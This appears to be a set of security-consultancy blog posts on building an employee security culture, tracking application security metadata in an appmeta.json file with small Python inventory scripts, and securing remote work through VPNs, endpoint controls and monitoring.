Acknowledging the human risk to company security isn't about blaming any individual. Instead, it's about highlighting the failure of leadership to create and reinforce a security culture that prepares its people to manage security issues. A security culture sets up an understanding of risks, norms, and expectations of behavior, reinforcing itself through action. It provides employees with knowledge and the tools to make smart security decisions in compliance with the organization's security program. And ultimately, a security culture makes critical actions and behaviors second nature to everyone in the business.

The fundamental obstacle to creating a security culture? It’s the failure to invest the resources necessary to build up security-savvy employees who understand where the risks are and make security hygiene a part of their daily responsibilities.


There are five key aspects to creating a security culture. Each has its own set of challenges, but each is necessary to create a genuine culture that becomes embedded within the organization.


Security culture must permeate an organization from top to bottom. It can't take root if employees don't see executive leaders and middle managers taking security seriously.

Senior leadership must create and support a security program with clear lines of responsibility for executing the program. It requires investing in the resources needed to educate and communicate security policies, risks, and resources to employees. It also requires setting up systems that measure compliance and encourage security behaviors.

Last, leadership must personally demonstrate the security behaviors they want to see in others. If direct managers or senior executive teams are lax, it undermines efforts to create a genuine security culture.


Limiting your efforts to passive awareness campaigns won't create a security culture. A training video for new employees with a quiz at the end? Anyone can pass a 10-question quiz on material they've just seen. Making security policy documentation available online? Nobody's going to read through IT security documentation even if they do sign an attestation. When was the last time you read the Terms of Service before clicking “accept”?

Employees should regularly receive security communications that educate them about

All security communications should be written in plain English, free from IT jargon. They should also explain risks and potential threats in contexts employees recognize.

One challenge to creating security-minded employees is that the threat and its consequences can feel too remote. Instead of talking about abstractions like vectors and endpoints, a security communication could convey real-world scenarios. It might show how bad actors can easily trick people into sharing sensitive information, which they can then use to gain access to the company network. Design scenarios that clearly illustrate the difference between a poor security choice and a strong one, making it easy for employees to understand what's expected of them.

Don't limit yourself only to written security communications. For example, we built a series of short podcasts on security culture for IT teams. At less than five minutes each, it's content anyone can consume quickly.

Short videos, podcasts, recorded messages, and even memes can all deliver security education in ways that achieve higher engagement and retention than a written email or policy memo. When you have a library of multimedia security communications, it's easy to share a constant stream of easily digestible security awareness material.


Ongoing security training is the more formal, interactive side of communication that helps build a security culture. Some training can be self-directed through security communication materials, but it doesn't replace regular live training.

We always recommend that organizations role play a security incident to test their response plan. Employee role plays are great training opportunities without having to simulate a full-scale event, and they also focus on building confidence in employee decision-making. Role plays cover how to identify a potential security risk and how team members should respond. Using an active role play training approach sparks the "muscle memory" that helps employees recognize shades of the scenario in real life.


Cybersecurity risks can be costly and need to be taken seriously. But creating a culture of fear or blame around security isn't going to yield positive results. Similarly, teasing employees with the promise of bogus bonuses to teach them the risks of phishing doesn't create an open, positive security culture.

A negative security culture leaves employees afraid to speak up. If they make a security mistake or see something suspicious, they may feel the personal risk of raising the issue is greater than the cyber risk to the organization. Employees using an unauthorized device or application for work won't let anyone know—they'll just continue to use it. All these behaviors open vulnerabilities that your security team may never see until it's too late.

Instead, create programs that reward and recognize employees for being attentive to security. One of the benefits of creating a digital library of your security communications is that you can measure which team members engage with the content and how often. These metrics allow you to reward and recognize people for


Teach employees to think of workplace cybersecurity the same way they do about workplace safety. The workplace safety framework is a valuable model for embedding security into all areas of the company:

One of the biggest challenges here is bridging the gap between IT staff and other employees. An IT team that uses too much jargon or shows impatience with non-tech savvy employees makes it harder to bridge that gap.

If you're a small or new company without an IT department, your challenge is identifying people who can take on the role of security advisor or act as the conduit to outside resources.

The point is that each employee needs to understand that performing their duties in compliance with company security policy is their responsibility.


Security culture is the component of your security program that can maximize compliance. A positive security culture yields employees who are mindful of their role in maintaining company security and confident in their ability to mitigate risk. The combination of acting on your security policies and security culture will position your company to take on bigger, more lucrative clients who expect you to have a comprehensive security program.

How to Improve the Security of Your Applications: A Starting Point

When we implement security programs, we often advise clients to build an inventory of their applications. There is a lot we can do once we know what our inventory is, and we can do it right in the tools developers are already using. This post covers one way to do that.


When we know what applications we have, we can effectively plan what work needs to be done for each one.

If we have 10 apps with secrets hard coded in the repos, we can track that until all 10 are remediated.

If we have 1,000 apps that need to have dependencies updated, we can start to put a plan in place that allows us to do that over time.

Most of the time, the companies we know don’t do a great job of tracking information about applications, automating its collection, or making that data accessible and visible.


Most projects we see these days are using some git platform—Bitbucket, GitLab, GitHub, ProjectLocker, etc. Since developers are already using these platforms to store code, what if we just put the meta information in the repo with the code?

So imagine we add a new file to every repo: /appmeta.json.

Now we can write a program to list all of the repos for an org and pull out their security state. As you will see, the file also includes more general information, which is why we called it appmeta.json instead of security.json. Of course, you could adapt this practice and do it yourself with just the properties you care about, in the scope you want.
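A minimal sketch of that program might look like the following Python, which walks a directory of locally cloned repos, reads each appmeta.json, and builds a simple inventory. The directory layout and field names are assumptions based on the example file in this post:

```python
import json
from pathlib import Path

def build_inventory(checkout_root):
    """Scan each cloned repo under checkout_root for an appmeta.json
    and collect its name and security tier into one inventory list."""
    inventory = []
    for repo in sorted(Path(checkout_root).iterdir()):
        meta_file = repo / "appmeta.json"
        if not meta_file.is_file():
            # Track repos with no metadata so the gaps are visible too.
            inventory.append({"repo": repo.name, "appmeta": False})
            continue
        meta = json.loads(meta_file.read_text())
        inventory.append({
            "repo": repo.name,
            "appmeta": True,
            "name": meta.get("name", ""),
            "security_tier": meta.get("security", {}).get("tier"),
        })
    return inventory
```

In practice you would probably fetch the file through the GitHub or GitLab API rather than from local clones, but the aggregation step is the same.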


What meta information do we care about?

At a high level:

Security is just part of it.

Consider the following example, which we will go through section by section:

{
  "name": "",
  "description": "A platform for implementing security programs.",
  "stage": "live",
  "team": "SPIO",
  "development": {
    "slack": "securityprogramio",
    "github": "",
    "plan": "",
    "adr": "docs/adr/"
  },
  "support": {
    "slack": "securityprogramchat",
    "email": "",
    "github": "",
    "documentation": ""
  },
  "ops": {
    "email": "",
    "github": "",
    "documentation": ""
  },
  "continuity": {
    "tier": 2,
    "comment": "Important for SPIO business but not business critical for clients.",
    "email": "",
    "plan": "link"
  },
  "security": {
    "tier": 1,
    "summary": "Contains security information about clients. Very sensitive.",
    "email": "",
    "github": "",
    "threatmodel": "",
    "soxdata": false,
    "pcidata": false,
    "phidata": false,
    "piidata": true,
    "codereview": "2/24/2020",
    "training": "4/14/2020",
    "linting": "3/01/2020",
    "securityrequirements": "2/24/2020",
    "securityunittests": "",
    "dependencies": "3/05/2020",
    "staticanalysis": "",
    "dynamicanalysis": "",
    "pentest": "planned",
    "signal": "",
    "audit": ""
  }
}


At the top level we have:

Name: The name of the project
Description: A description
Stage: What lifecycle stage is the system in?
Team: The team responsible for the project


Then we have a section about the development of the app. This includes:

Slack: The development Slack channel
GitHub: The URL of the project in GitHub
Plan: The location of the development plan
ADR: Architecture decision records

The idea is to make it easy for this information to be collected and distributed beyond the development team, who undoubtedly already has access to these things and hopefully knows about them.


For support, we have similar but different attributes:

Slack: The Slack channel for support
Email: How to reach the support team via email
GitHub: URL for issues or other project info
Documentation: Where to get support documentation

If you are using Intercom or Zendesk or other support tools, you can include those URLs here so that it is easy for everyone to find support.


In some cases, we may have an ops team that works in a different set of tools. We can capture them here for a given project. In the example in this post, it is basically the same as Dev and Support.


BCP stands for business continuity planning. Having information about the plan, contacts, recovery, tier, etc. makes it easy to standardize and find the right people when needed.

Tier: The tier of the app. Typically 1 is most critical. (Numeric)
Comment: Text around the tier.
Email: Email to use to contact the BCP-related team.
Plan: Link to the response plan.


The security properties reflect the security state of the application.

Tier: Numeric tier of the app. (Numeric)
Summary: Text around the tier and app.
Email: Who to email about security for the app.
GitHub: Where the code lives.
ThreatModel: Link to the threat model (e.g. Threat Dragon).
soxdata: Does the app have Sarbanes-Oxley related data? (Boolean)
pcidata: Does the app have credit card data? (Boolean)
phidata: Does the app have personal health data? (Boolean)
piidata: Does the app have personally identifiable information (PII)? (Boolean)
codereview: When was the last code review? (Date)
training: When was the team last trained on security (OWASP Top 10)? (Date)
linting: When was linting last run? (Date)
securityrequirements: Security requirements are incorporated up to what date? (Date)
securityunittests: Security unit tests are running up to what date? (Date)
dependencies: Automated dependency checking was last run on what date? (Date)
staticanalysis: When was static analysis last run? (Date)
dynamicanalysis: When was dynamic analysis last run? (Date)
pentest: When was the last pentest? (Date)
signal: Signal function up to date as of? (Date)
audit: Audit function up to date as of? (Date)

As you can see there is a lot here. You could remove attributes you don’t care to track. You could add new ones that you want to track.
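One thing the date-valued attributes enable is automatically flagging stale security work. Here is a small sketch; the one-year threshold, the US month/day/year date format, and the list of activities checked are all illustrative choices, not a prescribed standard:

```python
from datetime import datetime, timedelta

# Dates in the example file look like "2/24/2020" (US month/day/year).
DATE_FORMAT = "%m/%d/%Y"

def stale_activities(security, as_of, max_age_days=365):
    """Return the security activities whose recorded date is missing,
    not a date at all (e.g. "planned"), or older than max_age_days."""
    stale = []
    for activity in ("codereview", "dependencies", "staticanalysis", "pentest"):
        value = security.get(activity, "")
        try:
            last = datetime.strptime(value, DATE_FORMAT)
        except ValueError:
            stale.append(activity)  # empty or non-date values count as stale
            continue
        if as_of - last > timedelta(days=max_age_days):
            stale.append(activity)
    return stale
```

Run across every repo's appmeta.json, a check like this turns the inventory into a living work queue rather than a static document.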


We are considering building some automation (think a tool written in Golang or JS) that you could point at a GitHub organization; it would iterate through the repositories, pull this file, and compile the data—maybe even a semi-static web view that would look like a rich inventory. If you’re interested, let us know. Maybe we can give you early access to help test.

How to Stay Secure While Working Remotely

In light of Coronavirus/Covid-19, and in particular the key CDC recommendation that we implement social distancing (work from home), we wanted to write a helpful post about how to stay secure as a remote employee.

Jemurai has always been remote-friendly, with employees sprinkled across the US, and we can talk about what makes our remote teams work. This post, however, focuses on the security angles of working from home.

We also put together a checklist for securing your remote work environment that you can download and use across your teams.


The good news is that it is practical to work from home when the appropriate infrastructure is in place.

For some companies that already have a VPN and maybe use primarily cloud-based SaaS tools to get work done, there may be more of a social impact than a technical impact to working remotely. In other words, people can be productive and secure working remotely in this scenario.

There are also a lot of companies that are quite close to being able to unleash a remote workforce with just a few safety measures put in place to ensure that information isn’t exposed or compromised in the process.


The bad news is that there are a lot of companies that aren’t well prepared for lots of remote work. Either they have internal systems that are not easily exposed outside of their office, or they rely on paper trails and other physical security measures tied to the office.

Consider also that many classic security tools are running in the corporate network. What happens if most users aren’t really in the network?


The following sections provide detail around different things we need to do to ensure our work environment is safe.

Wireless Networking

Often, employees working at home are using their home wireless network. To ensure that organizational information is not compromised, we need to take several steps to secure the Wi-Fi.

When we work from home, even if our Wi-Fi is secure, other devices on the home network can usually see our computer, and our specific location is often available to the sites and services that we visit.

A VPN is a strong countermeasure for both local computers on the network being able to see our traffic and for obscuring our exact physical location.

It is ideal if the company can offer a VPN service with tested configurations that work with supported devices. If it cannot, there are commercial VPN services (e.g. ProtonVPN) and even do-it-yourself options like Algo, which is what we at Jemurai use.

In security, we talk about confidentiality, availability and integrity. It turns out that availability is an important part of successful remote work. That may mean paying a little more for better internet service.


Optional Enhancements:

Browsing Awareness

We expect to see increased phishing and social engineering activity related both to coronavirus specifically and to more people working remotely in general. That means phishing campaigns and other attempts to manipulate employees are even more likely than they were before. We advocate for specific awareness campaigns against these types of manipulation.

In some corporate environments, there are countermeasures in place to ensure that employees cannot accidentally browse to a malicious website. Essentially, the corporate network has a directory (DNS) that your computer uses to look up where it is going to visit and the directory contains information about “bad” or “malicious” sites and doesn’t let you go there.

Sometimes the corporate protections work if you are on a company VPN.

There are also free public DNS services that can protect you from malicious URLs, including Quad9.


Physical Environment

It sounds obvious, but when you are working from home your conversations are not private to a company audience and your desk is not hidden from casual observers. Whether it is your spouse, a house cleaner, your kids' friends, or a relative at a party, you probably don’t control (or want to monitor) your physical environment at home the way it is managed in an office space.

Most companies implement a clean desk policy anyway to ensure that passwords, client data or other sensitive information is never sitting exposed to passersby.


Company Internal Networking

In the event that there are internal services that are not easily exposed, a company will have to do some soul searching and decide how to address this gap.

On the one hand, it is technically possible to expose internal systems using solutions like Citrix, or even VPN. On the other hand, if the remote part of this setup isn’t established yet it may be costly and complicated to set up a solution like that.

It may be that the best approach is to focus on identifying cloud-based alternatives or workflows that do not require the on site systems. On some level, being able to overcome this centralization should be part of a business continuity plan already - where critical systems are identified and ways to use them under changing circumstances are understood and tested.

There are some basic issues that can arise. One is related to group policies that IT should be pushing out to users; this is a challenge if the user isn’t connecting to a central domain controller. Another concrete example is that security mechanisms like Windows Event Forwarding (WEF) must be set up to report to a place they can reach, and an internal forwarding address won’t be visible from outside.


Endpoint Controls

It is very important that laptops and other work devices used for remote work have encryption enabled. This is true even when employees work in an office, but the risk of a laptop “disappearing” may be higher at home or in other remote locations.

It is also important that systems are patched regularly.

Although tools like AntiVirus and AntiMalware programs are important in the office, they are arguably even more important out of the office because an event, incident or compromise might be much harder to detect at an infrastructure level. Therefore, in an ideal world, we would mandate and enforce that these endpoint controls are in place before connecting to valuable company services.

Commercial VPN tools provide these types of controls, but most open-source VPN tools do not. The risk we take here should be commensurate with the size of the organization and the sensitivity of the data involved.

To say that another way, use commercial VPN tools that let you enforce endpoint configuration (OS Updated, Programs Patched) if your data is extremely sensitive.



The best rule for storage, i.e. where your files live, is to use the same locations when working remotely that you use when on site. This can be a problem if the typical approach is to use a Windows file share, for example. Sometimes a VPN can provide access to these shared resources, but that requires an enterprise-grade managed VPN.

On the other hand, if there are approved storage solutions like Dropbox, Box, Drive or OneDrive, these can be used the same way remotely as they are in person.

That being said, it is important that users do not use personal file storage solutions to work around company shortcomings. This can result in unintended data exposure.


Things Not To Do

There are some things that people naturally do when they want to be productive from home that are probably not a good idea.

These include:

  1. Using Remote Desktop to connect to an onsite computer
  2. Using LogMeIn, a reverse proxy, etc. to get access to a computer “in the network”
  3. Putting their files in a personal Dropbox folder to use from home
  4. Using their personal computer for company work without taking the appropriate precautions

Monitoring and Support

To support remote work, there is an onus upon the organization to update and enhance their security monitoring capabilities.

We would generally want to see the detection of:

  1. Any inbound corporate traffic
  2. Outbound traffic to e.g. LogMeIn
  3. Unpatched endpoints
  4. Users not using VPN
  5. Security related events
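As one example of item 4, if your authentication logs record source IPs, a detection for "users not using VPN" can be as simple as checking logins against the VPN egress range. A sketch, where the range and event shape are purely hypothetical:

```python
import ipaddress

# Hypothetical VPN egress range; substitute your provider's actual range.
VPN_RANGE = ipaddress.ip_network("203.0.113.0/24")

def non_vpn_logins(events):
    """Given (user, source_ip) login events, return the set of users
    whose connection did not come through the VPN egress range."""
    flagged = set()
    for user, source_ip in events:
        if ipaddress.ip_address(source_ip) not in VPN_RANGE:
            flagged.add(user)
    return flagged
```

Most SIEMs can express the same rule natively; the point is simply that this class of detection is cheap to add once remote work becomes the norm.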


The environment outside the office when employees work remotely is often quite different from the office network.

Many of the same security measures are important in both cases, but out of the office, there is usually less support around technology and “drive by help” may not be accessible. It may be helpful to work through the details and publish specific guidance (even a WFH Policy) for employees to help them navigate this.

We wanted to help companies shifting to remote setups maintain secure work environments so we collected the safety measures into a handy checklist for employees to use when thinking about their setup at home. You can download it here.

Also, feel free to reach out at